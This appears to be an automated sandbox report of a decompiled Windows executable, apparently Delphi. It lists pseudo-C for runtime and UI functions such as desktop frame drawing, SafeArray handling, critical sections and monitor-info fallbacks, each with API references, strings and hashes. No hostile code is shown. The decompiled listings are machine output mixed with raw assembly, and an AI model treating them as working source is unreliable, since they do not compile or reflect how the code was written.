E0043B5A8(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) { char _v5; struct HWND__* _v12; struct HDC__* _v16; void* _v20; intOrPtr _v24; intOrPtr _v28; int _v32; int _v36; int _t76; intOrPtr _t82; int _t85; void* _t90; int _t91; void* _t94; void* _t95; intOrPtr _t96; _t94 = _t95; _t96 = _t95 + 0xffffffe0; _v5 = __ecx; _t76 = *((intOrPtr*)( *__edx + 0x38))(); if(_v5 == 0) { _push(__edx); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _pop(_t90); } else { _push(__edx); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _pop(_t90); } _v12 = GetDesktopWindow(); _v16 = GetDCEx(_v12, 0, 0x402); _push(_t94); _push(0x43b6c3); _push( *[fs:eax]); *[fs:eax] = _t96; _v20 = SelectObject(_v16, E004261BC( *((intOrPtr*)(_t90 + 0x48)))); _t91 = _v36; _t85 = _v32; PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049); PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049); PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049); PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049); SelectObject(_v16, _v20); _pop(_t82); *[fs:eax] = _t82; _push(0x43b6ca); return ReleaseDC(_v12, _v16); } 0x0043b5a9 0x0043b5ab 0x0043b5b1 0x0043b5bd 0x0043b5c3 0x0043b5d3 0x0043b5da 0x0043b5db 0x0043b5dc 0x0043b5dd 0x0043b5de 0x0043b5c5 0x0043b5c5 0x0043b5cc 0x0043b5cd 0x0043b5ce 0x0043b5cf 0x0043b5d0 0x0043b5d0 0x0043b5e4 0x0043b5f7 0x0043b5fc 0x0043b5fd 0x0043b602 0x0043b605 0x0043b61a 0x0043b626 0x0043b62e 0x0043b63b 0x0043b65d 0x0043b67c 0x0043b696 0x0043b6a3 0x0043b6aa 0x0043b6ad 0x0043b6b0 0x0043b6c2

APIs

GetDesktopWindow.USER32 ref: 0043B5DF GetDCEx.USER32(?,00000000,00000402), ref: 0043B5F2 SelectObject.GDI32(?,00000000), ref: 0043B615 PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B63B PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B65D PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B67C PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B696 SelectObject.GDI32(?,?), ref: 0043B6A3 ReleaseDC.USER32 ref: 0043B6BD

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow String ID: API String ID: 1187665388-0 Opcode ID: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e Instruction ID: 4169a8a6f7cde27594b8dc9ea805dfdf28c36229a5204248b9e0b1c31a3baf9f Opcode Fuzzy Hash: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e Instruction Fuzzy Hash: 6F31FB76A00219BFDB01DEEDCC85EAFBBBCEF09704B414569B504F7281C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E0040FAE0(short* __eax, intOrPtr __ecx, signed short* __edx) { char _v260; char _v768; char _v772; short* _v776; intOrPtr _v780; char _v784; signed int _v788; signed short* _v792; char _v796; char _v800; intOrPtr* _v804; void* __ebp; signed char _t47; signed int _t54; void* _t62; intOrPtr* _t73; signed short* _t91; void* _t93; void* _t95; void* _t98; void* _t99; intOrPtr* _t108; void* _t112; intOrPtr _t113; char* _t114; void* _t115; _t100 = __ecx; _v780 = __ecx; _t91 = __edx; _v776 = __eax; if(( *(__edx + 1) & 0x00000020) == 0) { E0040F688(0x80070057); } _t47 = *_t91 & 0x0000ffff; if((_t47 & 0x00000fff) != 0xc) { _push(_t91); _push(_v776); L0040E2AC(); return E0040F688(_v776); } else { if((_t47 & 0x00000040) == 0) { _v792 = _t91[4]; } else { _v792 = *(_t91[4]); } _v788 = *_v792 & 0x0000ffff; _t93 = _v788 - 1; if(_t93 < 0) { L9: _push( &_v772); _t54 = _v788; _push(_t54); _push(0xc); L0040E70C(); _t113 = _t54; if(_t113 == 0) { E0040F3E0(_t100); } E0040FA38(_v776); *_v776 = 0x200c; *((intOrPtr*)(_v776 + 8)) = _t113; _t95 = _v788 - 1; if(_t95 < 0) { L14: _t97 = _v788 - 1; if(E0040FA54(_v788 - 1, _t115) != 0) { L0040E744(); E0040F688(_v792); L0040E744(); E0040F688( &_v260); _v780(_t113, &_v260, &_v800, _v792, &_v260, &_v796); } _t62 = E0040FA84(_t97, _t115); } else { _t98 = _t95 + 1; _t73 = &_v768; _t108 = &_v260; do { *_t108 = *_t73; _t108 = _t108 + 4; _t73 = _t73 + 8; _t98 = _t98 - 1; } while (_t98 != 0); do { goto L14; } while (_t62 != 0); return _t62; } } else { _t99 = _t93 + 1; _t112 = 0; _t114 = &_v772; do { _v804 = _t114; _push(_v804 + 4); _t18 = _t112 + 1; // 0x1 _push(_v792); L0040E714(); E0040F688(_v792); _push( &_v784); _t21 = _t112 + 1; // 0x1 _push(_v792); L0040E71C(); E0040F688(_v792); *_v804 = _v784 - *((intOrPtr*)(_v804 + 4)) + 1; _t112 = _t112 + 1; _t114 = _t114 + 8; _t99 = _t99 - 1; } while (_t99 != 0); goto L9; } } } 0x0040fae0 0x0040faec 0x0040faf2 0x0040faf4 0x0040fafe 0x0040fb05 0x0040fb05 0x0040fb0a 0x0040fb18 0x0040fc91 0x0040fc98 0x0040fc99 0x00000000 0x0040fb1e 0x0040fb21 0x0040fb33 0x0040fb23 0x0040fb28 0x0040fb28 0x0040fb42 0x0040fb4e 0x0040fb51 0x0040fbbe 0x0040fbc4 0x0040fbc5 0x0040fbcb 0x0040fbcc 0x0040fbce 0x0040fbd3 0x0040fbd7 0x0040fbd9 0x0040fbd9 0x0040fbe4 0x0040fbef 0x0040fbfa 0x0040fc03 0x0040fc06 0x0040fc22 0x0040fc29 0x0040fc34 0x0040fc4b 0x0040fc50 0x0040fc64 0x0040fc69 0x0040fc7c 0x0040fc7c 0x0040fc85 0x0040fc08 0x0040fc08 0x0040fc09 0x0040fc0f 0x0040fc15 0x0040fc17 0x0040fc19 0x0040fc1c 0x0040fc1f 0x0040fc1f 0x0040fc22 0x00000000 0x00000000 0x00000000 0x0040fc22 0x0040fb53 0x0040fb53 0x0040fb54 0x0040fb56 0x0040fb5c 0x0040fb5e 0x0040fb6d 0x0040fb6e 0x0040fb78 0x0040fb79 0x0040fb7e 0x0040fb89 0x0040fb8a 0x0040fb94 0x0040fb95 0x0040fb9a 0x0040fbb5 0x0040fbb7 0x0040fbb8 0x0040fbbb 0x0040fbbb 0x00000000 0x0040fb5c 0x0040fb51

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FB79 SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FB95 SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040FBCE SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FC4B SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040FC64 VariantCopy.OLEAUT32(?), ref: 0040FC99

Strings

, xrefs: 0040FAFA

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant String ID: API String ID: 351091851-3916222277 Opcode ID: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72 Instruction ID: e8b17cf1572734a03829fa1d627ab26794180486a0a47edda1f815aa89ecf2ba Opcode Fuzzy Hash: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72 Instruction Fuzzy Hash: 38513E7590021D9BCB22DB59C891AD9B3BCAF0C304F4045FAE908F7641D638AF858F65

Uniqueness

Uniqueness Score: -1.00%

APIs

Part of subcall function 004584CC: GetActiveWindow.USER32 ref: 004584F3 Part of subcall function 004584CC: GetLastActivePopup.USER32(?), ref: 00458505 GetWindowRect.USER32 ref: 004571A2 SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004571DA MessageBoxA.USER32 ref: 00457219 SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045728F,?,00000000,00457288), ref: 00457269 SetActiveWindow.USER32(00000000,0045728F,?,00000000,00457288), ref: 0045727A

Strings

cF , xrefs: 0045718E ( , xrefs: 0045717F

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$LastMessagePopupRect String ID: cF$( API String ID: 3456420849-2654615770 Opcode ID: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838 Instruction ID: e3fa6410cbb3c08fe700889c1ec58b143b8f2f9b644a860e070ba4dfd1801142 Opcode Fuzzy Hash: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838 Instruction Fuzzy Hash: E1511875E04108AFDB44DBA9DD81FAEB7B9FB48301F1445AAF900EB392D678AD048B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 71%

E0042048C(void* __eax, void* __ebx, void* __edi, void* __esi) { char _v5; intOrPtr* _v12; long _v16; char _v20; char _v24; long _t22; char _t29; void* _t53; intOrPtr _t61; intOrPtr* _t62; intOrPtr _t63; intOrPtr _t66; intOrPtr _t67; void* _t72; void* _t73; intOrPtr _t74; _t72 = _t73; _t74 = _t73 + 0xffffffec; _push(__esi); _push(__edi); _t53 = __eax; _t22 = GetCurrentThreadId(); _t62 = *0x462f38; // 0x463034 if(_t22 != *_t62) { _v24 = GetCurrentThreadId(); _v20 = 0; _t61 = *0x462da0; // 0x416108 E0040C214(_t53, _t61, 1, __edi, __esi, 0, &_v24); E00404184(); } if(_t53 <= 0) { E00420464(); } else { E00420470(_t53); } _v16 = 0; EnterCriticalSection(0x4662e8); _push(_t72); _push(0x420651); _push( *[fs:eax]); *[fs:eax] = _t74; _v16 = InterlockedExchange( &E00461BEC, _v16); _push(_t72); _push(0x420632); _push( *[fs:eax]); *[fs:eax] = _t74; if(_v16 == 0 || *((intOrPtr*)(_v16 + 8)) <= 0) { _t29 = 0; } else { _t29 = 1; } _v5 = _t29; if(_v5 == 0) { L15: _pop(_t63); *[fs:eax] = _t63; _push(E00420639); return E00403928(_v16); } else { if( *((intOrPtr*)(_v16 + 8)) > 0) { _v12 = E0041A80C(_v16, 0); E0041A6F8(_v16, 0); LeaveCriticalSection(0x4662e8); *[fs:eax] = _t74; *[fs:eax] = _t74; *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72, *[fs:eax], 0x4205d5, _t72); _pop(_t66); *[fs:eax] = _t66; _t67 = 0x420596; *[fs:eax] = _t67; _push(E004205DC); EnterCriticalSection(0x4662e8); return 0; } else { goto L15; } } } 0x0042048d 0x0042048f 0x00420493 0x00420494 0x00420495 0x00420497 0x0042049c 0x004204a4 0x004204ab 0x004204ae 0x004204b8 0x004204c5 0x004204ca 0x004204ca 0x004204d1 0x004204dc 0x004204d3 0x004204d5 0x004204d5 0x004204e3 0x004204eb 0x004204f2 0x004204f3 0x004204f8 0x004204fb 0x0042050c 0x00420511 0x00420512 0x00420517 0x0042051a 0x00420521 0x0042052c 0x00420530 0x00420530 0x00420530 0x00420532 0x00420539 0x0042061c 0x0042061e 0x00420621 0x00420624 0x00420631 0x0042053f 0x00420616 0x0042054e 0x00420556 0x00420560 0x00420570 0x0042057e 0x00420589 0x0042058e 0x00420591 0x004205bf 0x004205c2 0x004205c5 0x004205cf 0x004205d4 0x00000000 0x00000000 0x00000000 0x00420616

APIs

GetCurrentThreadId.KERNEL32 ref: 00420497 GetCurrentThreadId.KERNEL32 ref: 004204A6 Part of subcall function 00420464: ResetEvent.KERNEL32(00000270,004204E1,?,?,00000000), ref: 0042046A EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507 LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560 EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF

Strings

40F , xrefs: 0042049C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset String ID: 40F API String ID: 2189153385-2631550472 Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6 Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7 Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004493D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { intOrPtr _v8; void* __ecx; intOrPtr _t9; void* _t11; intOrPtr _t17; void* _t28; intOrPtr _t33; intOrPtr _t34; intOrPtr _t37; struct HINSTANCE__* _t41; void* _t43; intOrPtr _t45; intOrPtr _t46; _t45 = _t46; _push(__ebx); _t43 = __edx; _t28 = __eax; if( *0x466574 == 0) { *0x466574 = E0040C9AC("comctl32.dll", __eax); if( *0x466574 >= 0x60000) { _t41 = GetModuleHandleA("comctl32.dll"); if(_t41 != 0) { *0x466578 = GetProcAddress(_t41, "ImageList_WriteEx"); } } } _v8 = E00421180(_t43, 1, 0); _push(_t45); _push(0x4494d2); _push( *[fs:eax]); *[fs:eax] = _t46; if( *0x466578 == 0) { _t9 = _v8; if(_t9 != 0) { _t9 = _t9 - 0xffffffec; } _push(_t9); _t11 = E00448314(_t28); _push(_t11); L004234D8(); if(_t11 == 0) { _t33 = *0x462c60; // 0x423548 E0040C1D8(_t33, 1); E00404184(); } } else { _t17 = _v8; if(_t17 != 0) { _t17 = _t17 - 0xffffffec; } _push(_t17); _push(1); _push(E00448314(_t28)); if( *0x466578() != 0) { _t34 = *0x462c60; // 0x423548 E0040C1D8(_t34, 1); E00404184(); } } _pop(_t37); *[fs:eax] = _t37; _push(0x4494d9); return E00403928(_v8); } 0x004493d9 0x004493dc 0x004493df 0x004493e1 0x004493ea 0x004493f6 0x00449405 0x00449411 0x00449415 0x00449422 0x00449422 0x00449415 0x00449405 0x00449437 0x0044943c 0x0044943d 0x00449442 0x00449445 0x0044944f 0x00449489 0x0044948e 0x00449490 0x00449490 0x00449493 0x00449496 0x0044949b 0x0044949c 0x004494a3 0x004494a5 0x004494b2 0x004494b7 0x004494b7 0x00449451 0x00449451 0x00449456 0x00449458 0x00449458 0x0044945b 0x0044945c 0x00449465 0x0044946e 0x00449470 0x0044947d 0x00449482 0x00449482 0x0044946e 0x004494be 0x004494c1 0x004494c4 0x004494d1

APIs

Part of subcall function 0040C9AC: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0040CA82), ref: 0040C9EE Part of subcall function 0040C9AC: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA23 Part of subcall function 0040C9AC: VerQueryValueA.VERSION(?,0040CA94,?,?,00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA3D GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0044940C GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0044941D ImageList_Write.COMCTL32(00000000,?,00000000,004494D2), ref: 0044949C

Strings

comctl32.dll , xrefs: 004493EC H5B , xrefs: 00449470, 004494A5 ImageList_WriteEx , xrefs: 00449417 comctl32.dll , xrefs: 00449407

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite String ID: H5B$ImageList_WriteEx$comctl32.dll$comctl32.dll API String ID: 4063495462-2067531044 Opcode ID: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788 Instruction ID: 7feeba355522faf04f3a0e2cb1e42fc148b7a82705179c7db10de74883139383 Opcode Fuzzy Hash: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788 Instruction Fuzzy Hash: 6A21A470704200BBF700EF7AED86A2B37A9AB84758B11013EF801D7391EA7D9D01E65D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E00423010(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; struct HMONITOR__* _t28; struct tagMONITORINFO* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633c != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && _t30->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { _t30->rcMonitor.left = 0; _t30->rcMonitor.top = 0; _t30->rcMonitor.right = GetSystemMetrics(0); _t30->rcMonitor.bottom = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { *0x466320 = E00422CE4(4, _t24, *0x466320, _t28, _t30); _t25 = GetMonitorInfoA(_t28, _t30); } return _t25; } 0x00423019 0x0042301c 0x00423026 0x0042304b 0x00423053 0x00423073 0x00423078 0x00423083 0x0042308e 0x00423098 0x00423099 0x0042309a 0x0042309b 0x0042309c 0x0042309d 0x004230a7 0x004230b2 0x004230b2 0x004230b7 0x004230b7 0x00423028 0x0042303a 0x00423047 0x00423047 0x004230c1

APIs

GetMonitorInfoA.USER32(?,?), ref: 00423041 SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423068 GetSystemMetrics.USER32 ref: 0042307D GetSystemMetrics.USER32 ref: 00423088 lstrcpyA.KERNEL32(?,DISPLAY), ref: 004230B2 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

DISPLAY , xrefs: 004230A9 GetMonitorInfo , xrefs: 00423028

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy String ID: DISPLAY$GetMonitorInfo API String ID: 1539801207-1633989206 Opcode ID: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1 Instruction ID: 1d13c1e411ecf5a9961b19d848809dc4e278015fb6addf28eb62cabff9c87d63 Opcode Fuzzy Hash: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1 Instruction Fuzzy Hash: 4F11DC71B003249ED720DF25AC407A7B7F9FB05711F40492AED4597394E7B8AA488BBA

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004230E4(intOrPtr _a4, intOrPtr* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; intOrPtr _t27; intOrPtr _t28; intOrPtr* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633d != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { *((intOrPtr*)(_t30 + 4)) = 0; *((intOrPtr*)(_t30 + 8)) = 0; *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0); *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { _t27 = *0x466324; // 0x4230e4 *0x466324 = E00422CE4(5, _t24, _t27, _t28, _t30); _t25 = *0x466324(_t28, _t30); } return _t25; } 0x004230ed 0x004230f0 0x004230fa 0x0042311f 0x00423127 0x00423147 0x0042314c 0x00423157 0x00423162 0x0042316c 0x0042316d 0x0042316e 0x0042316f 0x00423170 0x00423171 0x0042317b 0x00423186 0x00423186 0x0042318b 0x0042318b 0x004230fc 0x00423101 0x0042310e 0x0042311b 0x0042311b 0x00423195

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042313C GetSystemMetrics.USER32 ref: 00423151 GetSystemMetrics.USER32 ref: 0042315C lstrcpyA.KERNEL32(?,DISPLAY), ref: 00423186 Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

GetMonitorInfoA , xrefs: 004230FC 0B , xrefs: 00423101, 0042310E, 00423115 DISPLAY , xrefs: 0042317D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy String ID: DISPLAY$GetMonitorInfoA$0B API String ID: 2545840971-2122693701 Opcode ID: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5 Instruction ID: 8329856f4a0663fa361ed590d044dbc65a5c11abf511ac1c4802788fd1076b43 Opcode Fuzzy Hash: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5 Instruction Fuzzy Hash: CE11CD71700320AFE7208F64AC447A7B7F8EB09311F40452FED5597281E7B8A950CBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E004045BC(void* __ecx) { long _v4; int _t3; if( *0x46304c == 0) { if( *0x46102c == 0) { _t3 = MessageBoxA(0, "Runtime error at 00000000", "Error", 0); } return _t3; } else { if( *0x463220 == 0xd7b2 && *0x463228 > 0) { *0x463238(); } WriteFile(GetStdHandle(0xfffffff5), "Runtime error at 00000000", 0x1e, &_v4, 0); return WriteFile(GetStdHandle(0xfffffff5), E00404644, "true", &_v4, 0); } } 0x004045c4 0x00404624 0x00404634 0x00404634 0x0040463a 0x004045c6 0x004045cf 0x004045df 0x004045df 0x004045fb 0x0040461c 0x0040461c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5 WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610 WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616 MessageBoxA.USER32 ref: 00404634

Strings

Runtime error at 00000000 , xrefs: 004045EE, 0040462D Error , xrefs: 00404628

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message String ID: Error$Runtime error at 00000000 API String ID: 1570097196-2970929446 Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5 Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7 Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 55%

E00448638(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) { intOrPtr _v8; struct HDC__* _v12; char _v28; char _v44; void* __edi; void* __ebp; void* _t46; void* _t57; int _t85; void* _t119; void* _t120; void* _t129; struct HDC__* _t138; struct HDC__* _t139; int _t140; void* _t141; _t121 = __ecx; _t137 = __ecx; _v8 = __edx; _t120 = __eax; _t46 = E004481D8(__eax); if(_t46 != 0) { _t144 = _a4; if(_a4 == 0) { __eflags = *(_t120 + 0x54); if( *(_t120 + 0x54) == 0) { _t140 = E00428F64(1); *(_t120 + 0x54) = _t140; E0042A27C(_t140, 1); *((intOrPtr*)( *_t140 + 0x40))(); _t121 = *_t140; *((intOrPtr*)( *_t140 + 0x34))(); } E00426188( *((intOrPtr*)(E00429538( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags); E004193B4(0, *(_t120 + 0x34), 0, &_v44, *(_t120 + 0x30)); _push( &_v44); _t57 = E00429538( *(_t120 + 0x54)); _pop(_t129); E0042652C(_t57, _t129, _t137); _push(0); _push(0); _push(0xffffffff); _push(0); _push(0); _push(0); _push(0); _push(E0042681C(E00429538( *(_t120 + 0x54)))); _push(_v8); _push(E00448314(_t120)); L00423490(); E004193B4(_a16, _a16 + *(_t120 + 0x34), _a12, &_v28, _a12 + *(_t120 + 0x30)); _v12 = E0042681C(E00429538( *(_t120 + 0x54))); E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags); _t138 = E0042681C(_t137); SetTextColor(_t138, 0xffffff); SetBkColor(_t138, 0); _t85 = _a16 + 1; __eflags = _t85; BitBlt(_t138, _t85, _a12 + 1, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746); E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85); _t139 = E0042681C(_t137); SetTextColor(_t139, 0xffffff); SetBkColor(_t139, 0); return BitBlt(_t139, _a16, _a12, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746); } _push(_a8); _push(E00448028(_t144)); E00448610(_t120, _t144); _push(E00448028(_t144)); _push(0); _push(0); _push(_a12); _push(_a16); _push(E0042681C(__ecx)); _push(_v8); _t119 = E00448314(_t120); _push(_t119); L00423490(); return _t119; } return _t46; } 0x00448638 0x00448641 0x00448643 0x00448646 0x0044864a 0x00448651 0x00448657 0x0044865b 0x004486a1 0x004486a5 0x004486b3 0x004486b5 0x004486bc 0x004486c8 0x004486d0 0x004486d2 0x004486d2 0x004486e5 0x004486f9 0x00448701 0x00448705 0x0044870a 0x0044870b 0x00448710 0x00448712 0x00448714 0x00448716 0x00448718 0x0044871a 0x0044871c 0x0044872b 0x0044872f 